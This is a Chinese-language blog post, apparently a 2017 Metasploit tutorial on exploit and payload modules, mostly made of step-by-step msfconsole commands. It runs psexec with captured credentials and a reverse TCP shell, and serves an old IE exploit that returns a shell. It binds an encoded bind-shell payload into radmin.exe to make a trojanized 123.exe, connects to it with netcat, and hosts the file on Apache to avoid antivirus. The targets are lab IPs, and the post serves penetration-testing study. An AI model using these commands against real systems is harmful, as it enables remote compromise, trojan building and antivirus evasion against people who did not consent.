美文网首页
exploit和payload模块

exploit和payload模块

作者: Instu | 来源:发表于2017-04-10 17:05 被阅读0次

Exploit模块

RHOST远程主机,LHOST本地主机

1.active,受害者的服务存在漏洞,攻击者主动向受害者发送漏洞利用代码。

实例:exploit/windows/smb/psexec

适用场景:攻击者获取到了受害者的账号和密码,但是受害者机器上没有开放Telnet,远程桌面等服务。

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost 192.168.80.150

msf exploit(psexec) > set smbuser coler

msf exploit(psexec) > set smbpass 123456

msf exploit(psexec) > set payload windows/shell/reverse_tcp

msf exploit(psexec) > set lhost 192.168.80.163

msf exploit(psexec) > exploit -j

msf exploit(handler) > sessions -u 1 将shell提升到meterpreter类型的shell


2.passive,受害者的客户端程序存在漏洞,攻击者诱使受害者使用存在漏洞的客户端程序,访问自己构建好的 存在漏洞利用代码的服务端程序。

实例:exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.80.163

msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp

msf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.80.163

msf exploit(ms07_017_ani_loadimage_chunksize) > exploit

在存在漏洞的IE浏览器上访问http://192.168.80.163/,攻击者会得到受害者的shell。


Payload模块

msf > use payload/windows/shell_bind_tcp

msf payload(shell_bind_tcp) > generate -b '\x00'  过滤坏字符(实际是使用encoders模块将坏字符编码)

msf payload(shell_bind_tcp) > generate -b '\x00\xff' -t exe -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f 123.exe  将payload绑定到radmin.exe中

在靶机上运行123.exe,然后在攻击机上连接靶机的4444端口,会获得靶机的shell。

root@kali:/usr/share/windows-binaries# nc 192.168.80.11 4444


补充:有时将绑定payload的执行程序拷贝到物理机上,会被物理机的杀毒软件杀掉,可以先开启msf的Apache服务,将exe程序放在/var/www/html目录下,然后通过虚拟机直接访问下载。

root@kali:~# service apache2 start

root@kali:~# cp 123.exe /var/www/html/

相关文章

  • exploit和payload模块

    Exploit模块 RHOST远程主机,LHOST本地主机 1.active,受害者的服务存在漏洞,攻击者主动向受...

  • MSF学习整理_1

    一、专业术语 渗透攻击——exploit。 攻击载荷——payload 溢出代码——shellcode 模块——m...

  • Meterpreter session x closed. Re

    问题 持续断线重连 Payload: 解决 exploit/multi/handler 使用的 Payload 与...

  • 图形化payload、Passthehash

    获取图形化payload msf > use exploit/windows/local/bypassuacmsf...

  • 任务149:生成 payload

    假如exploit是导弹,那么payload就是攻击的导弹头。换句话说,即使没有exploit,只要目标在被诱使的...

  • 任务151:Meterpreter 基本命令和Meterpret

    上面的exploit配合meterpreter类型的payload目的是让目标能够反弹meterpreter类型的...

  • msfconsole

    Exploit 模块 --》漏洞利用 payloads --》shellcode 漏洞利用后执行的代码 use e...

  • 任务148:Exploit 模块

    msf的exploits模块分为两类,主动和被动 主动指的是攻击者主动给目标发送exploit,让目标开启某个端口...

  • Exp5 MSF基础应用

    实验前的了解:MSF的六种模块 Exploit模块 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和...

  • POST模块、后门

    msf exploit(psexec) > use exploit/multi/handlermsf exploi...

网友评论

      本文标题:exploit和payload模块

      本文链接:https://www.haomeiwen.com/subject/zdteattx.html